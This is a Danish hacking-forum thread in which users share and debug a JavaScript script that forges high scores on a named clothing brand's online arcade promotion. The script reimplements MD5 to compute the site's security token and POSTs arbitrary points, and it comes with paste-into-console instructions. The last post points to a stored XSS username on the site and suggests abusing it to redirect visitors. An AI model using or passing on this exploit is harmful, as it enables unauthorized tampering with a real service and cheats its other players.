24-09-2016, 20:12
(24-09-2016, 16:23)Ash Skrev: [ -> ]Men det var det eneste der blev sendt med, så vidt jeg kunne se.
Så skulle det være fordi de har tracking på playtime pr ip.
Og derved kan se hvilke brugere på hvilke ip osv.
24-09-2016, 20:12
24-09-2016, 20:14
(24-09-2016, 20:12)Cronick Skrev: [ -> ]Så skulle det være fordi de har tracking på playtime pr ip.
Og derved kan se hvilke brugere på hvilke ip osv.
De kan vel ikke se om man faktisk spiller.
24-09-2016, 20:26
(24-09-2016, 20:14)Ash Skrev: [ -> ]De kan vel ikke se om man faktisk spiller.
De kan vel se hvad ip din score request kommer fra, så det er vel bare i++ til en counter i databasen for den ip.
24-09-2016, 21:19
(24-09-2016, 20:26)Cronick Skrev: [ -> ]De kan vel se hvad ip din score request kommer fra, så det er vel bare i++ til en counter i databasen for den ip.
Det tæller jo ikke tiden man har spillet lol
26-04-2017, 17:50
Siden deres sikkerhed ikke er steget voldsomt meget, så tænkte jeg at jeg lige så godt kunne release et script som gjorde det samme som tidligere.
Samme fremgangsmåde som sidst. Copy-paste scriptet ind i webconsole på http://www.slamjamsocialism.com/arcad-ism/arcad-ism.php siden, og så bare ændre XXX ved pointz og i mellem (email, 'XXX', token).
Scriptet:
Samme fremgangsmåde som sidst. Copy-paste scriptet ind i webconsole på http://www.slamjamsocialism.com/arcad-ism/arcad-ism.php siden, og så bare ændre XXX ved pointz og i mellem (email, 'XXX', token).
Scriptet:
Spoiler (Click to View)
function str2blks(a) {
for (var b = 1 + (a.length + 8 >> 6), c = new Array(16 * b), d = 0; d < 16 * b; d++) c[d] = 0;
for (d = 0; d < a.length; d++) c[d >> 2] |= a.charCodeAt(d) << d % 4 * 8;
return c[d >> 2] |= 128 << d % 4 * 8, c[16 * b - 2] = 8 * a.length, c
}
function ff(a, b, c, d, e, f, g) {
return cmn(b & c | ~b & d, a, b, e, f, g)
}
function gg(a, b, c, d, e, f, g) {
return cmn(b & d | c & ~d, a, b, e, f, g)
}
function hh(a, b, c, d, e, f, g) {
return cmn(b ^ c ^ d, a, b, e, f, g)
}
function ii(a, b, c, d, e, f, g) {
return cmn(c ^ (b | ~d), a, b, e, f, g)
}
function cmn(a, b, c, d, e, f) {
return add(rol(add(add(b, a), add(d, f)), e), c)
}
function add(a, b) {
var c = (65535 & a) + (65535 & b);
return (a >> 16) + (b >> 16) + (c >> 16) << 16 | 65535 & c
}
function rol(a, b) {
return a << b | a >>> 32 - b
}
function m(str) {
var x = str2blks(str);
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;
for (var i = 0; i < x.length; i += 16) {
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = ff(a, b, c, d, x[i + 0], 7, -680876936);
d = ff(d, a, b, c, x[i + 1], 12, -389564586);
c = ff(c, d, a, b, x[i + 2], 17, 606105819);
b = ff(b, c, d, a, x[i + 3], 22, -1044525330);
a = ff(a, b, c, d, x[i + 4], 7, -176418897);
d = ff(d, a, b, c, x[i + 5], 12, 1200080426);
c = ff(c, d, a, b, x[i + 6], 17, -1473231341);
b = ff(b, c, d, a, x[i + 7], 22, -45705983);
a = ff(a, b, c, d, x[i + 8], 7, 1770035416);
d = ff(d, a, b, c, x[i + 9], 12, -1958414417);
c = ff(c, d, a, b, x[i + 10], 17, -42063);
b = ff(b, c, d, a, x[i + 11], 22, -1990404162);
a = ff(a, b, c, d, x[i + 12], 7, 1804603682);
d = ff(d, a, b, c, x[i + 13], 12, -40341101);
c = ff(c, d, a, b, x[i + 14], 17, -1502002290);
b = ff(b, c, d, a, x[i + 15], 22, 1236535329);
a = gg(a, b, c, d, x[i + 1], 5, -165796510);
d = gg(d, a, b, c, x[i + 6], 9, -1069501632);
c = gg(c, d, a, b, x[i + 11], 14, 643717713);
b = gg(b, c, d, a, x[i + 0], 20, -373897302);
a = gg(a, b, c, d, x[i + 5], 5, -701558691);
d = gg(d, a, b, c, x[i + 10], 9, 38016083);
c = gg(c, d, a, b, x[i + 15], 14, -660478335);
b = gg(b, c, d, a, x[i + 4], 20, -405537848);
a = gg(a, b, c, d, x[i + 9], 5, 568446438);
d = gg(d, a, b, c, x[i + 14], 9, -1019803690);
c = gg(c, d, a, b, x[i + 3], 14, -187363961);
b = gg(b, c, d, a, x[i + 8], 20, 1163531501);
a = gg(a, b, c, d, x[i + 13], 5, -1444681467);
d = gg(d, a, b, c, x[i + 2], 9, -51403784);
c = gg(c, d, a, b, x[i + 7], 14, 1735328473);
b = gg(b, c, d, a, x[i + 12], 20, -1926607734);
a = hh(a, b, c, d, x[i + 5], 4, -378558);
d = hh(d, a, b, c, x[i + 8], 11, -2022574463);
c = hh(c, d, a, b, x[i + 11], 16, 1839030562);
b = hh(b, c, d, a, x[i + 14], 23, -35309556);
a = hh(a, b, c, d, x[i + 1], 4, -1530992060);
d = hh(d, a, b, c, x[i + 4], 11, 1272893353);
c = hh(c, d, a, b, x[i + 7], 16, -155497632);
b = hh(b, c, d, a, x[i + 10], 23, -1094730640);
a = hh(a, b, c, d, x[i + 13], 4, 681279174);
d = hh(d, a, b, c, x[i + 0], 11, -358537222);
c = hh(c, d, a, b, x[i + 3], 16, -722521979);
b = hh(b, c, d, a, x[i + 6], 23, 76029189);
a = hh(a, b, c, d, x[i + 9], 4, -640364487);
d = hh(d, a, b, c, x[i + 12], 11, -421815835);
c = hh(c, d, a, b, x[i + 15], 16, 530742520);
b = hh(b, c, d, a, x[i + 2], 23, -995338651);
a = ii(a, b, c, d, x[i + 0], 6, -198630844);
d = ii(d, a, b, c, x[i + 7], 10, 1126891415);
c = ii(c, d, a, b, x[i + 14], 15, -1416354905);
b = ii(b, c, d, a, x[i + 5], 21, -57434055);
a = ii(a, b, c, d, x[i + 12], 6, 1700485571);
d = ii(d, a, b, c, x[i + 3], 10, -1894986606);
c = ii(c, d, a, b, x[i + 10], 15, -1051523);
b = ii(b, c, d, a, x[i + 1], 21, -2054922799);
a = ii(a, b, c, d, x[i + 8], 6, 1873313359);
d = ii(d, a, b, c, x[i + 15], 10, -30611744);
c = ii(c, d, a, b, x[i + 6], 15, -1560198380);
b = ii(b, c, d, a, x[i + 13], 21, 1309151649);
a = ii(a, b, c, d, x[i + 4], 6, -145523070);
d = ii(d, a, b, c, x[i + 11], 10, -1120210379);
c = ii(c, d, a, b, x[i + 2], 15, 718787259);
b = ii(b, c, d, a, x[i + 9], 21, -343485551);
a = add(a, olda);
b = add(b, oldb);
c = add(c, oldc);
d = add(d, oldd)
}
return rhex(a) + rhex(b) + rhex( c ) + rhex(d)
}
function rhex(a) {
for (var b = "", c = 0; c <= 3; c++) b += hex_chr.charAt(a >> 8 * c + 4 & 15) + hex_chr.charAt(a >> 8 * c & 15);
return b
}
function setPoint(a, b, c) {
for (var d = parseInt(c.substring(1, 2)), e = parseInt(c.substring(5, 6)), f = parseInt(c.substring(9, 10)), g = Math.ceil(b * e / f) + c + a, h = 1; h <= d; h++) g = m(g);
return g
}
var hex_chr = "0123456789abcdef";
$.ajax({
method: "POST",
url: "callback-ism.php",
data: {
action: "setpoint",
email: email,
pointz: 'XXX',
sec: setPoint(email, 'XXX', token)
}
});
26-04-2017, 18:50
Mon ikke undre sig over at alle danskerne pludselig har top score?
26-04-2017, 20:30
Kan du sige mig hvorfor den gir mig den her error? https://gyazo.com/fd13bd2adea27a320a0d0447a329ca42
26-04-2017, 21:01
(26-04-2017, 20:30)wienke1999 Skrev: [ -> ]Kan du sige mig hvorfor den gir mig den her error? https://gyazo.com/fd13bd2adea27a320a0d0447a329ca42
Ser underligt ud. Ikke noget jeg selv har stødt på.
26-04-2017, 21:05
Ret denne linje:
return rhex(a) + rhex(b) + rhex© + rhex(d)
til:
return rhex(a) + rhex(b) + rhex( c ) + rhex(d)
edit:
( c ) uden spaces.
Shellsec er så smart at lave ( c ) til ©
return rhex(a) + rhex(b) + rhex© + rhex(d)
til:
return rhex(a) + rhex(b) + rhex( c ) + rhex(d)
edit:
( c ) uden spaces.
Shellsec er så smart at lave ( c ) til ©
26-04-2017, 21:08
(26-04-2017, 21:05)r2Ed Skrev: [ -> ]Ret denne linje:
return rhex(a) + rhex(b) + rhex© + rhex(d)
til:
return rhex(a) + rhex(b) + rhex( c ) + rhex(d)
edit:
( c ) uden spaces.
Shellsec er så smart at lave ( c ) til ©
Ahh ja, godt spottet.
Ser ud til jeg ikke er den eneste som har været igang med at lege med det.
Der er en som åbenbart har oprettet en bruger med navnet <script>alert('HI')</script>, så hvis nogen keder sig, så lav et redirect til shellsec og så bare sæt en høj score xD